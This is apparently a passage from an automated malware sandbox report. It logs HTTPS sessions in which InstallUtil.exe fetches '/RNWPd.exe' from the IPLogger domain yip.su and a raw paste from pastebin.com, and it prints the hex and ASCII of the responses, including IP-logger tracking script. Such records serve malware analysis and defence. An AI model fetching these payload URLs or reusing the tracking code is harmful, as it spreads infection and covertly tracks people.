                                                CF-RAY: 8b0aaed11b0f41e6-EWR
                                                2024-08-09 21:01:41 UTC1147INData Raw: 31 31 33 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                                                Data Ascii: 1136<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                                                2024-08-09 21:01:41 UTC1369INData Raw: 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 61 6c 65 72 74 20 63 66 2d 61 6c 65 72 74 2d 65 72 72 6f 72 20 63 66 2d 63 6f 6f 6b 69 65 2d 65 72 72 6f 72 22 20 69 64 3d 22 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 65 6e 61 62 6c 65 5f 63 6f 6f 6b 69 65 73 22 3e 50 6c 65 61 73 65 20 65 6e 61 62 6c 65 20 63 6f 6f 6b 69 65 73 2e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 22 20 63 6c 61 73 73 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 2d 77 72 61 70 70 65 72
                                                Data Ascii: !--<![endif]--></head><body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper
                                                2024-08-09 21:01:41 UTC1369INData Raw: 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 20 63 66 2d 62 74 6e 2d 64 61 6e 67 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 62 64 32 34 32 36 3b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 64 69 73 6d 69 73 73 5f 61 6e 64 5f 65 6e 74 65 72 22 3e 49 67 6e 6f 72 65 20 26 20 50 72 6f 63 65 65 64 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 66 6f 72 6d 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76
                                                Data Ascii: re</a> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div
                                                2024-08-09 21:01:41 UTC529INData Raw: 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 2d 69 70 22 29 2c 63 3d 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 22 29 3b 62 26 26 22 63 6c 61 73 73 4c 69 73 74 22 69 6e 20 62 26 26 28 62 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 2c 63 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 63 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 68 69 64 64 65 6e 22 29 3b 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 29 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 7d 29 29 7d 76
                                                Data Ascii: etElementById("cf-footer-item-ip"),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}v
                                                2024-08-09 21:01:41 UTC5INData Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                19192.168.2.649742188.114.96.34434876C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                TimestampBytes transferredDirectionData
                                                2024-08-09 21:01:42 UTC65OUTGET /RNWPd.exe HTTP/1.1
                                                Host: yip.su
                                                Connection: Keep-Alive
                                                2024-08-09 21:01:42 UTC906INHTTP/1.1 200 OK
                                                Date: Fri, 09 Aug 2024 21:01:42 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                memory: 0.36196136474609375
                                                expires: Fri, 09 Aug 2024 21:01:42 GMT
                                                strict-transport-security: max-age=604800
                                                strict-transport-security: max-age=31536000
                                                content-security-policy: img-src https: data:; upgrade-insecure-requests
                                                x-frame-options: SAMEORIGIN
                                                Cache-Control: max-age=14400
                                                CF-Cache-Status: HIT
                                                Age: 0
                                                Last-Modified: Fri, 09 Aug 2024 21:01:42 GMT
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=im6GC9lxMSQzkNSvihhkeio1H7OVy%2B99B5yVRAQAt8BCh3H%2BhtdY5%2Fudkmf8PZUN5iGOMhQJ%2BraYpSV6i0ijcm63AiU2ak7K%2BuC3cy1lHtHvx3QfEuOf3ew%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 8b0aaed5198a4361-EWR
                                                alt-svc: h3=":443"; ma=86400
                                                2024-08-09 21:01:42 UTC463INData Raw: 31 64 32 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 22 20 63 6c 61 73 73 3d 22 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c
                                                Data Ascii: 1d26<!DOCTYPE html><html lang="" class="html"><head><title></title><meta http-equiv="content-type" content="text/html; charset=utf-8" /><meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width,
                                                2024-08-09 21:01:42 UTC1369INData Raw: 73 69 74 2d 61 66 74 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 37 20 64 61 79 73 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 73 68 6f 72 74 65 6e 65 72 2c 20 69 70 6c 6f 67 67 65 72 2c 20 73 68 6f 72 74 6c 69 6e 6b 2c 20 75 72 6c 2c 20 64 6f 6d 61 69 6e 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 69 70 6c 6f 67 67 65 72 2e 6f 72 67 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 0a 09 3c 6d 65 74 61 20 70
                                                Data Ascii: sit-after" content="7 days" /><meta name="keywords" content="shortener, iplogger, shortlink, url, domain" /><meta name="description" content="" /><link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" /><meta p
                                                2024-08-09 21:01:42 UTC1369INData Raw: 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 33 33 38 62 64 39 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6d 61 72 67 69 6e 3a 32 35 70 78 20 35 70 78 20 30 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 32 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 33 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d
                                                Data Ascii: round-color:#338bd9;display:inline-block;margin:25px 5px 0;-webkit-animation:jump 1s linear infinite;animation:jump 1s linear infinite}#loader>span:nth-child(2){-webkit-animation-delay:0.2s;animation-delay:0.2s}#loader>span:nth-child(3){-webkit-animation-
                                                2024-08-09 21:01:42 UTC1369INData Raw: 6f 72 2e 75 73 65 72 41 67 65 6e 74 44 61 74 61 2e 70 6c 61 74 66 6f 72 6d 3d 3d 3d 27 57 69 6e 64 6f 77 73 27 29 7b 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 44 61 74 61 2e 67 65 74 48 69 67 68 45 6e 74 72 6f 70 79 56 61 6c 75 65 73 28 5b 27 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 27 5d 29 2e 74 68 65 6e 28 75 61 3d 3e 7b 5f 70 3d 70 61 72 73 65 49 6e 74 28 75 61 2e 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 2e 73 70 6c 69 74 28 27 2e 27 29 5b 30 5d 29 7d 29 7d 0a 09 76 61 72 20 5f 79 3d 5b 5d 2c 5f 7a 3d 7b 7d 2c 5f 78 3d 66 75 6e 63 74 69 6f 6e 28 6e 61 6d 65 2c 64 61 74 61 2c 6e 29 7b 69 66 28 74 79 70 65 6f 66 28 64 61 74 61 29 21 3d 3d 27 6f 62 6a 65 63 74 27 29 7b 64 61 74 61 3d 7b 7d 7d 3b 6e 3d 5f 79 2e 69 6e 64 65 78 4f 66
                                                Data Ascii: or.userAgentData.platform==='Windows'){navigator.userAgentData.getHighEntropyValues(['platformVersion']).then(ua=>{_p=parseInt(ua.platformVersion.split('.')[0])})}var _y=[],_z={},_x=function(name,data,n){if(typeof(data)!=='object'){data={}};n=_y.indexOf
                                                2024-08-09 21:01:42 UTC1369INData Raw: 70 74 3e 0a 0a 3c 73 74 79 6c 65 3e 0a 2e 77 72 61 70 70 65 72 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 30 70 78 7d 2e 63 6f 6e 74 61 69 6e 65 72 7b 77 69 64 74 68 3a 34 34 30 70 78 3b 6d 69 6e 2d 77 69 64 74 68 3a 33 32 30 70 78 3b 68 65 69 67 68 74 3a 33 35 30 70 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 6d 73 2d 66 6c 65 78 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6c 65 78 2d 77 72 61 70 3a 77 72 61 70 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 62
                                                Data Ascii: pt><style>.wrapper{margin-top:100px}.container{width:440px;min-width:320px;height:350px;display:-ms-flexbox;display:flex;-ms-flex-align:center;align-items:center;-ms-flex-pack:center;justify-content:center;text-align:center;flex-wrap:wrap;margin:auto;b
                                                2024-08-09 21:01:42 UTC1369INData Raw: 74 3a 33 31 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 7d 2e 6c 6f 67 6f 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 63 6f 6c 6f 72 3a 23 30 37 34 64 37 63 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 70 65 72 22 3e 0a 0a 20 20 20 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 65 61 64 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 6f 6d 61 69 6e 22 3e 0a 09 09 09 09 3c 64 69
                                                Data Ascii: t:31px;margin:auto}.logo .logo-text{color:#074d7c;text-align:center;font-size:12px;white-space:nowrap;font-family:arial;font-weight:700}</style><div class="wrapper"> <div class="container"> <div class="header"><div class="domain"><di
                                                2024-08-09 21:01:42 UTC162INData Raw: 2c 61 2e 73 74 79 6c 65 2e 70 6f 73 69 74 69 6f 6e 3d 27 61 62 73 6f 6c 75 74 65 27 2c 61 2e 73 74 79 6c 65 2e 74 6f 70 3d 69 2c 61 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 69 2c 61 2e 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 75 6e 74 65 72 2e 79 61 64 72 6f 2e 72 75 2f 68 69 74 3f 27 2b 75 72 6c 2e 6a 6f 69 6e 28 27 3b 27 29 2c 64 2e 62 6f 64 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 61 29 3b 0a 09 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                Data Ascii: ,a.style.position='absolute',a.style.top=i,a.style.left=i,a.src='https://counter.yadro.ru/hit?'+url.join(';'),d.body.appendChild(a);</script></body></html>
                                                2024-08-09 21:01:42 UTC5INData Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                20192.168.2.649743172.67.19.244434876C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                TimestampBytes transferredDirectionData
                                                2024-08-09 21:01:47 UTC74OUTGET /raw/V6VJsrV3 HTTP/1.1
                                                Host: pastebin.com
                                                Connection: Keep-Alive
                                                2024-08-09 21:01:47 UTC222INHTTP/1.1 200 OK
                                                Date: Fri, 09 Aug 2024 21:01:47 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                X-Frame-Options: SAMEORIGIN
                                                Server: cloudflare
                                                CF-RAY: 8b0aaef57e360c80-EWR
                                                2024-08-09 21:01:47 UTC1147INData Raw: 31 31 33 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                                                Data Ascii: 1136<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                                                2024-08-09 21:01:47 UTC1369INData Raw: 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 61 6c 65 72 74 20 63 66 2d 61 6c 65 72 74 2d 65 72 72 6f 72 20 63 66 2d 63 6f 6f 6b 69 65 2d 65 72 72 6f 72 22 20 69 64 3d 22 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 65 6e 61 62 6c 65 5f 63 6f 6f 6b 69 65 73 22 3e 50 6c 65 61 73 65 20 65 6e 61 62 6c 65 20 63 6f 6f 6b 69 65 73 2e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 22 20 63 6c 61 73 73 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 2d 77 72 61 70 70 65 72
                                                Data Ascii: !--<![endif]--></head><body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper
                                                2024-08-09 21:01:47 UTC1369INData Raw: 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 20 63 66 2d 62 74 6e 2d 64 61 6e 67 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 62 64 32 34 32 36 3b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 64 69 73 6d 69 73 73 5f 61 6e 64 5f 65 6e 74 65 72 22 3e 49 67 6e 6f 72 65 20 26 20 50 72 6f 63 65 65 64 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 66 6f 72 6d 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76
                                                Data Ascii: re</a> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div
                                                2024-08-09 21:01:47 UTC529INData Raw: 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 2d 69 70 22 29 2c 63 3d 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 22 29 3b 62 26 26 22 63 6c 61 73 73 4c 69 73 74 22 69 6e 20 62 26 26 28 62 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 2c 63 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 63 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 68 69 64 64 65 6e 22 29 3b 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 29 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 7d 29 29 7d 76
                                                Data Ascii: etElementById("cf-footer-item-ip"),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}v
                                                2024-08-09 21:01:47 UTC5INData Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                21192.168.2.649744188.114.96.34434876C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                TimestampBytes transferredDirectionData
                                                2024-08-09 21:01:48 UTC65OUTGET /RNWPd.exe HTTP/1.1
                                                Host: yip.su
                                                Connection: Keep-Alive
                                                2024-08-09 21:01:48 UTC896INHTTP/1.1 200 OK
                                                Date: Fri, 09 Aug 2024 21:01:48 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                memory: 0.36196136474609375
                                                expires: Fri, 09 Aug 2024 21:01:48 GMT
                                                strict-transport-security: max-age=604800
                                                strict-transport-security: max-age=31536000
                                                content-security-policy: img-src https: data:; upgrade-insecure-requests
                                                x-frame-options: SAMEORIGIN
                                                Cache-Control: max-age=14400
                                                CF-Cache-Status: HIT
                                                Age: 0
                                                Last-Modified: Fri, 09 Aug 2024 21:01:48 GMT
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VtYSUSXiMzqsopLTN4SXDXnKj0vwEcaO5aFBKV9bW8pGOclyUEWymU3g6QtRMwzH8vyGCmm3OYEP1cqiSAbOwBzIhq4ZDm4tAxqqSjXGfdMyMehGW19uwhE%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 8b0aaefbd8e34237-EWR
                                                alt-svc: h3=":443"; ma=86400
                                                2024-08-09 21:01:48 UTC473INData Raw: 31 64 32 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 22 20 63 6c 61 73 73 3d 22 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c
                                                Data Ascii: 1d26<!DOCTYPE html><html lang="" class="html"><head><title></title><meta http-equiv="content-type" content="text/html; charset=utf-8" /><meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width,
                                                2024-08-09 21:01:48 UTC1369INData Raw: 20 63 6f 6e 74 65 6e 74 3d 22 37 20 64 61 79 73 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 73 68 6f 72 74 65 6e 65 72 2c 20 69 70 6c 6f 67 67 65 72 2c 20 73 68 6f 72 74 6c 69 6e 6b 2c 20 75 72 6c 2c 20 64 6f 6d 61 69 6e 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 69 70 6c 6f 67 67 65 72 2e 6f 72 67 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f
                                                Data Ascii: content="7 days" /><meta name="keywords" content="shortener, iplogger, shortlink, url, domain" /><meta name="description" content="" /><link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" /><meta property="o
